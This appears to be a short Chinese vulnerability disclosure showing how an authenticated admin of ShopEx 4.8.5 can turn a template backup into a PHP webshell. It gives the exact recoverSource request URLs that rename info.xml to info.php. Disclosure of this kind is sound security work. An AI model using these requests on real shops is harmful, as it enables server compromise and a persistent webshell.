### 简要描述:
shopex485 最新后台拿webshell
### 详细说明:
shopex485 最新后台拿webshell
测试版本:shopex485
日期:2014.8.25
### 漏洞证明:
页面管理-模板列表-模板文件管理,选择任意页面修改
[<img src="https://images.seebug.org/upload/201408/252237507fd297b048a7c0cb55a9de74d9aa5f5b.jpg" alt="QQ图片1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/252237507fd297b048a7c0cb55a9de74d9aa5f5b.jpg)
[<img src="https://images.seebug.org/upload/201408/252242496b30cbb47aeaf4c2f8501ed23d2a8690.jpg" alt="addda.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/252242496b30cbb47aeaf4c2f8501ed23d2a8690.jpg)
保存两次,复制info.bak_2.xml链接
```
http://127.0.0.1/shopex/shopadmin/index.php?ctl=system/tmpimage&act=recoverSource&p[0]=info.bak_2.xml&p[1]=info.xml&p[2]=1354864820
```
info.xml修改为info.php
```
http://127.0.0.1/shopex/shopadmin/index.php?ctl=system/tmpimage&act=recoverSource&p[0]=info.bak_2.xml&p[1]=info.php&p[2]=1354864820
```
[<img src="https://images.seebug.org/upload/201408/25224605c5441b4ab2b718de74e54efc14df1289.jpg" alt="addddddddddddd.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/25224605c5441b4ab2b718de74e54efc14df1289.jpg)
shell就躺在了模板文件夹下
[<img src="https://images.seebug.org/upload/201408/252247146c2341846370c5092d670f149081f7ff.jpg" alt="QQ图片20140825224437.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/252247146c2341846370c5092d670f149081f7ff.jpg)
暂无评论